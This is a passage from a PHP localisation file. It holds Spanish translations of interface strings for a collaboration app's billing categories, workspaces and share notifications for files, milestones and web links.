  'no billing categories desc' => 'Si desea habilitar el soporte para facturación basado en tiempos de trabajo, por favor ingrese una nueva categoría de facturación.',
  'billing support is enabled' => 'El soporte para facturación se encuentra habilitado',
  'BillingCategory default_value required' => 'Esta categoría de facturación necesita una tarifa horaria por defecto',
  'defined in a parent workspace' => 'Definido en un espacio anterior',
  'defined in the current workspace' => 'Definido en el espacio actual',
  'total billing by user' => 'Facturación total por usuario',
  'assign billing categories to users' => 'Asignar categorías de facturación a los usuarios',
  
  'share notification file desc' => '{1} lo ha invitado a ver/editar este archivo: {0}',
    'share notification milestone desc' => '{1} lo ha invitado a ver/editar este hito: {0}',
    'share notification weblink desc' => '{1} lo ha invitado a ver/editar este enlace web: {0}',

  	'new share notification file' => 'El archivo \'{0}\' ha sido compartido.',
    'new share notification milestone' => 'El hito \'{0}\' ha sido compartido.',
    'new share notification weblink' => 'El enlace web \'{0}\' ha sido compartido.',
    'new version notification title' => 'Nueva versión',
  ); // array

?>